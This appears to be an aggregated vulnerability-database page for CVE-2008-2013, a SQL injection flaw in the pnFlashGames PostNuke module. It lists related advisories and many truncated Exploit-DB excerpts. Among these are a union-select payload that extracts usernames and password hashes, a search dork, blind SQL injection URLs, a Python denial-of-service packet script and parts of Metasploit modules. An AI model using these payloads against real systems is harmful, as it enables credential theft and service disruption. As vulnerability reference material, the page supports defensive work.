CVE-2008-2013
Published 2008-04-30
Priority: P3 (35) · medium · CVSS 2.0 base score 6.8
CVSS 2.0 vector: AV:N/AC:M/Au:N/C:P/I:P/A:P
Exploit: available
EPSS: 1.04% (59.8th percentile)
SQL injection vulnerability in index.php in the pnFlashGames 1.5 through 2.5 module for PostNuke, when magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary SQL commands via the id parameter in a display action.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| pnflashgames | pnflashgames | — | — |
| pnflashgames | pnflashgames | — | — |
CVSS provenance
nvd · v2.0 · 6.8 MEDIUM · AV:N/AC:M/Au:N/C:P/I:P/A:P
cisa · 7.8 HIGH
vendor_redhat · 6.8 MEDIUM
GHSA
CVE-2008-2013 [MEDIUM] CWE-89 GHSA-r3cp-px3w-cp2q: SQL injection vulnerability in index
ghsa_unreviewed · 2022-05-01
SQL injection vulnerability in index.php in the pnFlashGames 1.5 through 2.5 module for PostNuke, when magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary SQL commands via the id parameter in a display action.
CISA
CVE-2017-8540 [HIGH] CWE-119 Microsoft Malware Protection Engine Improper Restriction of Operations Vulnerability
cisa · 2022-03-03 · CVSS 7.8
Vulnerability: Microsoft Malware Protection Engine Improper Restriction of Operations Vulnerability
Affected: Microsoft Malware Protection Engine
The Microsoft Malware Protection Engine running on Microsoft Forefront and Microsoft Defender on Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, and 1703, and Windows Server 2016, Microsoft Exchange Server 2013 and 2016, does not properly scan a specially crafted file leading to memory corruption. aka "Microsoft Malware Protection Engine Remote Code Execution Vulnerability".
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2017-8540
Remediation Due Date: 2022-03-24
Red Hat
CVE-2013-6230 [MEDIUM] bind: localnets ACL bypass caused by WinSock API bug
vendor_redhat · 2013-11-06 · CVSS 6.8
The Winsock WSAIoctl API in Microsoft Windows Server 2008, as used in ISC BIND 9.6-ESV before 9.6-ESV-R10-P1, 9.8 before 9.8.6-P1, 9.9 before 9.9.4-P1, 9.9.3-S1, 9.9.4-S1, and other products, does not properly support the SIO_GET_INTERFACE_LIST command for netmask 255.255.255.255, which allows remote attackers to bypass intended IP address restrictions by leveraging misinterpretation of this netmask as a 0.0.0.0 netmask.
Statement: Not vulnerable. This flaw only affected BIND on Microsoft Windows platforms with a flawed WinSock call. This vulnerability does not affect BIND on Linux or Unix platforms.
Package: bind (Red Hat Enterprise Linux 5) - Not affected
Package: bind97 (Red Hat Enterprise Linux 5) - Not affected
Package: bind (R
Red Hat
CVE-2013-1922 [MEDIUM] kvm: qemu-nbd block format auto-detection vulnerability
vendor_redhat · 2013-04-15 · CVSS 4.9
qemu-nbd in QEMU, as used in Xen 4.2.x, determines the format of a raw disk image based on the header, which allows local guest OS administrators to read arbitrary files on the host by modifying the header to identify a different format, which is used when the guest is restarted, a different vulnerability than CVE-2008-2004.
Statement: Not vulnerable.
This issue does not affect versions of kvm and xen packages as shipped with Red Hat Enterprise Linux 5. This issue does not affect versions of qemu-kvm packages as shipped with Red Hat Enterprise Linux 5 and 6.
Package: kvm (Red Hat Enterprise Linux 5) - Not affected
Package: qemu-kvm (Red Hat Enterprise Linux 6) - Not affected
No detection rules found.
Exploit-DB
CVE-2017-0199 Microsoft Excel - OLE Arbitrary Code Execution
exploitdb · 2017-09-30
---
Title: MS Office Excel (all versions) Arbitrary Code Execution Vulnerability
Date: September 30th, 2017.
Author: Eduardo Braun Prado
Vendor Homepage: http://www.microsoft.com/
Software Link: https://products.office.com/
Version: 2007,2010,2013,2016 32/64 bits (x86 and x64)
Tested on: Windows 10/8.1/8.0/7/Server 2012/Server 2008/Vista (X86 and x64)
CVE: 2017-0199
Description:
MS Excel contains a remote code execution vulnerability upon processing OLE objects. Although this is a different issue from the
MS Word HTA execution vulnerability, it has been patched together, 'silently'. By performing some tests from the Word HTA PoC posted
on exploit-db[dot]com, it's possible to exploit it through Excel too, however the target would ne
Exploit-DB
CVE-2014-6352 Microsoft Windows - OLE Package Manager Code Execution (MS14-060) (Metasploit)
exploitdb · 2014-10-20
---
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 "MS14-060 Microsoft Windows OLE Package Manager Code Execution",
'Description' => %q{
This module exploits a vulnerability found in Windows Object Linking and Embedding (OLE)
allowing arbitrary code execution, publicly known as "Sandworm". Platforms such as Windows
Vista SP2 all the way to Windows 8, Windows Server 2008 and 2012 are known to be
vulnerable. However, based on our testing, the most reliable setup is on Windows platforms
running Office 2013 and Office 2010 SP2. And please keep in mind that some other setups such
as using
Exploit-DB
CVE-2013-0928 EMC AlphaStor Device Manager Opcode 0x75 - Command Injection (Metasploit)
exploitdb · 2014-09-24
---
require 'msf/core'
class Metasploit3 'EMC AlphaStor Device Manager Opcode 0x75 Command Injection',
'Description' => %q{
This module exploits a flaw within the Device Manager (rrobtd.exe). When parsing the 0x75
command, the process does not properly filter user supplied input allowing for arbitrary
command injection. This module has been tested successfully on EMC AlphaStor 4.0 build 116
with Windows 2003 SP2 and Windows 2008 R2.
},
'Author' =>
[
'Anyway ', # Vulnerability Discovery
'Preston Thornburn ', # msf module
'Mohsan Farid ', # msf module
'Brent Morris ', # msf module
'juan vazquez' # convert aux module into exploit
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2013-0928'],
['ZDI', '13-033']
]
Exploit-DB
CVE-2013-0140 [HIGH] McAfee ePolicy Orchestrator 4.6.0 < 4.6.5 - 'ePowner' Multiple Vulnerabilities
exploitdb · 2014-04-28 · CVSS 7.9
---
# Tested on: Windows 2003/2008
# CVE : CVE-2013-0140 , CVE-2013-0141
# More info on: http://funoverip.net/?p=1685 & https://github.com/funoverip/epowner
PoC:
v0.2.1- https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/33071-2.tar.gz (epowner-0.2.1.zip)
INTRODUCTION
- In short, this tool registers a rogue agent on the ePo server and then takes advantage of the
following vulnerabilities to perform multiple actions :
- CVE-2013-0140 : Pre-auth SQL Injection
- CVE-2013-0141 : Pre-auth Directory Path Traversal
- The tool manages the following actions, called "mode" :
-r, --register Register a new agent on the ePo server (it's free)
--check Check the SQL Injection vulnerability
--add-admin Add a new web admin account into
Exploit-DB
CVE-2013-2347 HP Data Protector - Backup Client Service Remote Code Execution (Metasploit)
exploitdb · 2014-03-10
---
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 'HP Data Protector Backup Client Service Remote Code Execution',
'Description' => %q{
This module abuses the Backup Client Service (OmniInet.exe) to achieve remote code
execution. The vulnerability exists in the EXEC_BAR operation, which allows to
execute arbitrary processes. This module has been tested successfully on HP Data
Protector 6.20 on Windows 2003 SP2 and Windows 2008 R2.
},
'Author' =>
[
'Aniway.Anyway ', # Vulnerability discovery
'juan vazquez' # Metasploit module
],
'References' =>
[
[ 'CVE', '2013-2347' ],
[ 'BID', '6464
Exploit-DB
CVE-2013-2347 [CRITICAL] HP Data Protector - 'EXEC_BAR' Remote Command Execution
exploitdb · 2014-02-16 · CVSS 10.0
---
import argparse
import socket
"""
Exploit Title: HP Data Protector EXEC_BAR Remote Command Execution
Exploit Author: Chris Graham @cgrahamseven
CVE: CVE-2013-2347
Date: February 14, 2014
Vendor Homepage: www.hp.com
Version: 6.10, 6.11, 6.20
Tested On: Windows Server 2003, Windows Server 2008 R2
References:
https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03822422
http://www.zerodayinitiative.com/advisories/ZDI-14-008/
Details:
The omniinet service, which runs by default on port 5555, is susceptible
to numerous remotely exploitable vulnerabilities. By sending a malicious
EXEC_BAR packet (opcode 11), a remote attacker can force the omniinet
service to run an arbitrary command. On Windows, the omnii
Exploit-DB
CVE-2013-5486 Cisco Prime Data Center Network Manager - Arbitrary File Upload (Metasploit)
exploitdb · 2013-12-03
---
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 'Cisco Prime Data Center Network Manager Arbitrary File Upload',
'Description' => %q{
This module exploits a code execution flaw in Cisco Data Center Network Manager. The
vulnerability exists in processImageSave.jsp, which can be abused through a directory
traversal and a null byte injection to upload arbitrary files. The autodeploy JBoss
application server feature is used to achieve remote code execution. This module has been
tested successfully on Cisco Prime Data Center Network Manager 6.1(2) on Windows 2008 R2
(64 bits).
},
'Author'
Exploit-DB
CVE-2013-5680 HylaFAX+ 5.2.4 > 5.5.3 - Buffer Overflow
exploitdb · 2013-10-02
---
Details
Application: "HylaFAX+"
Version: 5.2.4 (April, 2008) through 5.5.3 (August 6, 2013)
Type: Daemon that manages a fax server via an FTP-like protocol.
Vendor / Maintainer: Lee Howard (faxguy _at_ howardsilvan.com)
Project Homepage: http://hylafax.sourceforge.net/
Vulnerability: CWE-120: Classic buffer overflow from unchecked network
traffic, resulting in heap corruption.
Vulnerability Discoverer: Dennis Jenkins (dennis.jenkins.75 _at_ gmail.com)
CVE reference: CVE-2013-5680, 2013-09-03
Solution Status: Fixed by vendor.
Description
"HylaFAX™ is an enterprise-class open-source system for sending and
receiving facsimiles as well as for sending alpha-numeric pages."
Vulnerability
HylaFAX+ contains a daemon, "hfaxd", that allows a "fax cl
Exploit-DB
CVE-2008-4423 Ovidentia 7.9.4 - Multiple Vulnerabilities
exploitdb · 2013-08-22
---
Ovidentia 7.9.4 Multiple Remote Vulnerabilities
Vendor: Cantico
Product web page: http://www.ovidentia.org
Affected version: 7.9.4
Summary: Ovidentia is both a content management system (CMS) and
a collaborative environment (Groupware).
Desc: Input passed via several parameters is not properly sanitized
before being returned to the user or used in SQL queries. This can
be exploited to manipulate SQL queries by injecting arbitrary SQL
code and HTML/script code in a user's browser session in context of
an affected site.
Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
Apache 2.4.2 (Win32)
PHP 5.4.7
MySQL 5.5.25a
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2013-5154
Advisory URL: http://www.z
Exploit-DB
CVE-2013-3174 Microsoft DirectShow - Arbitrary Memory Overwrite (MS13-056)
exploitdb · 2013-07-23
---
Introduction:
The Microsoft DirectShow application programming interface (API) is a media-streaming architecture for Microsoft Windows. Using DirectShow, your applications can perform high-quality video and audio playback or capture.
Overview:
DirectShow in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, and Windows Server 2012 allows remote attackers to execute arbitrary code via a crafted GIF file, aka "DirectShow Arbitrary Memory Overwrite Vulnerability."
Disclosure Timeline
2013-03-20 - Vulnerability reported to vendor
2013-07-09 - Coordinated public release of advisory
Details:
Microsoft's DirectShow API is vulnerable to
Exploit-DB
CVE-2008-1610 Quick TFTP Server Pro 2.2 - Denial of Service
exploitdb · 2013-06-07
---
#!/usr/bin/python
#Exploit Title: Quick TFTP Server 2.2 DoS
#Date: 6th June 2013
#Exploit Author: npn
#Exploit Author Homepage: http://www.iodigitalsec.com/
#Exploit Author Write Up: http://www.iodigitalsec.com/blog/fuzz-to-denial-of-service-quick-tftp-server-2-2/
#Vendor Homepage: http://www.tallsoft.com/tftpserver.htm
#Software Link: http://www.tallsoft.com/tftpserver_setup.exe
#Version: 2.2
#Tested on: Windows XP SP3 English
from socket import *
import sys
import select
pwn = "\x00\x02"
pwn += "\x66\x69\x6c\x65\x2e\x74\x78\x74\x00"
pwn += "A"*1200
pwn += "\x00"
address = ('192.168.200.20', 69)
server_socket = socket(AF_INET, SOCK_DGRAM)
server_socket.sendto(pwn, address)
Exploit-DB
CVE-2013-3661 Microsoft Windows NT/2000/2003/2008/XP/Vista/7/8 - 'EPATHOBJ' Local Ring
exploitdb · 2013-06-03
---
#ifndef WIN32_NO_STATUS
# define WIN32_NO_STATUS
#endif
#include
#include
#include
#include
#include
#ifdef WIN32_NO_STATUS
# undef WIN32_NO_STATUS
#endif
#include
#pragma comment(lib, "gdi32")
#pragma comment(lib, "kernel32")
#pragma comment(lib, "user32")
#pragma comment(lib, "shell32")
#pragma comment(linker, "/SECTION:.text,ERW")
#ifndef PAGE_SIZE
# define PAGE_SIZE 0x1000
#endif
#define MAX_POLYPOINTS (8192 * 3)
#define MAX_REGIONS 8192
#define CYCLE_TIMEOUT 10000
//
// --------------------------------------------------
// Windows NT/2K/XP/2K3/VISTA/2K8/7/8 EPATHOBJ local ring0 exploit
// ----------------------------------------- taviso () cmpxchg8b com -----
//
// INTRODUCTION
//
// There's a pretty ob
Exploit-DB
CVE-2008-5489 ClipShare 4.1.1 - Multiples Vulnerabilities
exploitdb · 2013-03-27
---
# Exploit Title: ClipShare 4.1.1 - Multiple Vulnerabilities
# Exploit Author: Esac
# Vulnerable Software: ClipShare - Video Sharing Community Script 4.1.4
# Official site: http://www.clip-share.com
# Software License: Commercial.
#all versions are vulnerable:
#Last Checked: 27 March 2013
# Note : to exploit this vulnerability MAGIC_QUOTES_GPC directive must be turned off on server side.(php.ini)
vuln file : gvideos.php , param : gid
Poc :
http://server/mavideo/gvideos.php?gid=1 [Blind]
#to exploit this PoC, a group with some public videos must have been added previously
Real exploitation :
http://server/mavideo/gvideos.php?gid=1 AND 1=1
==> return normal page
http://server/mavideo/gvideos.php?gid=1 AND 1=2
==> return page with some e
Exploit-DB
CVE-2013-1748 PHP-Address Book 3.1.5 - SQL Injection / Cross-Site Scripting
exploitdb · 2008-06-04
---
PHP-Address Book (SQL/XSS) Multiple Remote Vulnerabilities
,--^----------,--------,-----,-------^--,
| ||||||||| `--------' | O .. CWH Underground Hacking Team ..
`+---------------------------^----------|
`\_,-------, _________________________|
/ XXXXXX /`| /
/ XXXXXX / `\ /
/ XXXXXX /\______(
/ XXXXXX /
/ XXXXXX /
(________(
`------'
AUTHOR : CWH Underground
DATE : 4 June 2008
SITE : www.citec.us
#####################################################
APPLICATION : PHP-Address Book
VERSION :
http://[target]/[path]/index.php?group=
##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos #
#########################################################
Exploit-DB
CVE-2008-2013 PostNuke Module pnFlashGames 2.5 - SQL Injection
exploitdb · 2008-04-26
---
Vuln: Postnuke Mod pnFlashGames (Blind SQL/SQL) all version Vulnerability
Author: Vulnerability search Kacper (kacper1964_at_yahoo.pl)
dork: inurl:"index.php?module=pnFlashGames"
Author Homepage: http://devilteam.pl/
If magic_quotes_gpc = off
Vuln to old >2 version:
index.php?module=pnFlashGames&func=display&id=-1+union+select+concat(pn_uname,char(58),pn_pass),1,2,3,4,5,6,7,8+from+nuke_users+where+uid=2/*
Vuln to new version 1.5 == 2.5
[code]
\n";
echo "Login: Kacper Password:".$cryptpass;
@set_time_limit(0);
@ini_set("display_errors","0");
$hostname = gethostbyname($address);
function getid()
{global $hostname;
$responce = "";
$fsock = fsockopen($hostname,80,$errnum,$errstr,2);
$headers = "POST ".address."index.php?module=pnFl
Bugzilla
CVE-2013-6474 [MEDIUM] CVE-2013-6474 cups-filters: heap-based buffer overflow flaw in pdftoopvp
bugzilla · 2013-11-07 · CVSS 6.8
A heap-based buffer overflow flaw was found in the pdftoopvp filter. If a malicious PDF file were processed, it could lead to arbitrary code execution with the privileges of the "lp" user. This issue was due to the following fix not being present in pdftoopvp:
https://bugs.freedesktop.org/show_bug.cgi?id=17326
http://lists.freedesktop.org/archives/poppler/2008-August/004021.html
Acknowledgements:
This issue was discovered by Florian Weimer of the Red Hat Product Security Team.
Discussion:
Public via:
http://bzr.linuxfoundation.org/loggerhead/openprinting/cups-filters/revision/7176
This issue has been resolved in upstream cups-filters-1.0.47
---
Created cups-filters tracking bugs for this issue:
Affects: fed
Bugzilla
CVE-2013-2049 [HIGH] CVE-2013-2049 CloudForms Management Engine 2: static secret_token.rb value
bugzilla · 2013-05-03 · CVSS 7.5
Ruby on Rails uses a HMAC for verifying the integrity of signed cookies. To prevent session hash tampering, a digest is calculated from the session with a server-side secret and inserted into the end of the cookie.
It was found that CloudForms Management Engine (CFME) is using a statically defined secret, which is common across all deployments. A remote attacker could use this statically defined secret to perform a session tampering attack.
External references:
http://blog.phusion.nl/2013/01/04/securing-the-rails-session-secret/
http://blog.mhartl.com/2008/08/15/a-security-issue-with-rails-secret-session-keys/
Discussion:
Acknowledgements:
This issue was discovered by Ramon de C Valle of the Red Hat Product S
Bugzilla
CVE-2013-1922 [MEDIUM] CVE-2013-1922 qemu, qemu-kvm, kvm: qemu-nbd block format auto-detection vulnerability
bugzilla · 2013-03-19 · CVSS 4.9
A security flaw was found in the way qemu-nbd, the QEMU Disk Network Block Device server tool of QEMU, performed detection of image formats (the image format was previously autodetected). A guest operating system administrator could write a header to a particular raw disk image format, describing a format other than the original one for that disk image, leading to a scenario in which, after a restart of that guest, QEMU would detect the new format of the image and could allow the guest to read any file on the host if QEMU was sufficiently privileged.
A different vulnerability than CVE-2008-2004.
Discussion:
Acknowledgements:
This issue was found by Daniel Berrange of Red Hat.
---
Created attachment 712650
P
Bugzilla
CVE-2013-1927 [CRITICAL] CVE-2013-1927 icedtea-web: GIFAR issue
bugzilla · 2012-12-06 · CVSS 9.0
Current IcedTea-Web versions are affected by the GIFAR issue. It is possible to combine a GIF image with a Java JAR into a single file that is both a valid GIF and a valid JAR/ZIP file. This issue can be used to execute a Java applet in the context of a site that allows untrusted users to upload images in GIF format.
This problem was previously fixed in Oracle and IBM Java plugins as CVE-2008-5343 (bug 474790).
References:
http://en.wikipedia.org/wiki/Gifar
http://xs-sniper.com/blog/2008/12/17/sun-fixes-gifars/
http://riosec.com/how-to-create-a-gifar
Discussion:
Created attachment 659469
proposed patch
This patch is fixing the issue. Troubles will come when not just zip jars will be used (and so jar header will change) - eg pack2000 in jdk8.
Otherwi